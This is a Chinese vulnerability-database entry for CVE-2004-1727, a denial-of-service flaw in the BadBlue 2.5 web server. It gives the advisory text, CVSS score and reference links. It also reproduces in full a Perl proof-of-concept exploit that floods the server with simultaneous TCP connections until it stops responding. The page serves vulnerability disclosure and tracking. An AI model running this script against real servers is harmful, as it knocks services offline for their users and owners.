CVE-2004-1727
CVSS5.0
发布时间 :2004-08-20 00:00:00
修订时间 :2016-10-17 22:59:57
NMCOE    

[原文]BadBlue 2.5 allows remote attackers to cause a denial of service (refuse HTTP connections) via a large number of connections from the same IP address.


[CNNVD]BadBlue Web Server Service远程拒绝服务漏洞(CNNVD-200408-207)

        
        BadBlue是小型WEB服务器程序,提供目录保护功能。
        BadBlue在处理多连接过程中存在问题,远程攻击者可以利用这个漏洞对目标服务程序进行拒绝服务攻击。
        远程攻击者在同一主机发送超过24个同步连接,可导致系统挂起,停止任何主机的连接。
        

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1727
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-1727
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200408-207
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=109309119502208&w=2
(UNKNOWN)  BUGTRAQ  20040820 BadBlue Webserver v2.5 Denial Of Service Vulnerability
http://www.gulftech.org/?node=research&article_id=00043-08202004
(VENDOR_ADVISORY)  MISC  http://www.gulftech.org/?node=research&article_id=00043-08202004
http://www.securityfocus.com/bid/10983
(VENDOR_ADVISORY)  BID  10983
http://xforce.iss.net/xforce/xfdb/17064
(VENDOR_ADVISORY)  XF  badblue-mult-connection-dos(17064)

- 漏洞信息

BadBlue Web Server Service远程拒绝服务漏洞
中危 其他
2004-08-20 00:00:00 2006-08-23 00:00:00
远程  
        
        BadBlue是小型WEB服务器程序,提供目录保护功能。
        BadBlue在处理多连接过程中存在问题,远程攻击者可以利用这个漏洞对目标服务程序进行拒绝服务攻击。
        远程攻击者在同一主机发送超过24个同步连接,可导致系统挂起,停止任何主机的连接。
        

- 公告与补丁

        厂商补丁:
        BadBlue
        -------
        目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
        
        http://www.badblue.com

- 漏洞信息 (419)

BadBlue 2.52 Web Server Multiple Connections Denial of Service Exploit (EDBID:419)
windows dos
2004-08-26 Verified
0 GulfTech Security
N/A [点击下载]
#!/usr/bin/perl 
############################################################## 
# BadBlue v2.52 Web Server - Multiple Connections DoS POC Code 
############################################################## 
# BadBlue Web Server can not handle many simultaneous connects 
# from the same host, and will lock up until the connects stop 
############################################################## 
# This Proof Of Concept Written By GulfTech Security Research 
############################################################## 

use Strict; 
use Socket; 
use IO::Socket; 

my $host = $ARGV[0]; 
my $port = $ARGV[1]; 
my $stop = $ARGV[2]; 
my $size = 1000; 
my $prot = getprotobyname('tcp'); 
my $slep = $ARGV[3]; 

printf("================================================ "); 
printf(" BadBlue v2.52 Web Server Denial Of Service POC "); 
printf("================================================ "); 
printf("
Making %d Connections To %s ", $stop , $host); 

for ($i=1; $i<$stop; $i++) 
{ 
socket($i, PF_INET, SOCK_STREAM, $prot ); 
my $dest = sockaddr_in ($port, inet_aton($host)); 
connect($i, $dest); 
} 

CheckServer($host, $i, $slep, $stop); 
KillThreads($stop); 
printf("
Exploit Attempt Unsuccesful"); 
exit; 

sub CheckServer($host, $i, $slep, $stop) { 
($host, $i, $slep, $stop) = @_; 
$blank = "1512" x 2; 
$request = "GET / HTTP/1.0".$blank; 
$remote = IO::Socket::INET->new( Proto => "tcp", 
PeerAddr => $host, 
PeerPort => $port, 
Timeout => '10000', 
Type => SOCK_STREAM, 
); 
print $remote $request; 
unless ( <$remote> ) 
{ 
printf("
Host %s Has Been Successfully DoS'ed ", $host); 
printf("
The Host Will Be Down For %d Seconds ", $slep); 
sleep($slep); 
KillThreads($stop); 
exit; 
} 
} 

sub KillThreads($stop) { 
$stop = @_; 
printf("
Killing All active Connections"); 
for ($l=1; $l<$stop; $l++) { 
shutdown($l,2)|| die("Couldn't Shut Down Socket"); 
$l++; 
} 
} 

# milw0rm.com [2004-08-26]
		

- 漏洞信息

9107
BadBlue Connection Saturation Remote DoS
Remote / Network Access Denial of Service
Loss of Availability Solution Unknown
Exploit Public

- 漏洞描述

Unknown or Incomplete

- 时间线

2004-08-20 Unknow
2004-08-20 Unknow

- 解决方案

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站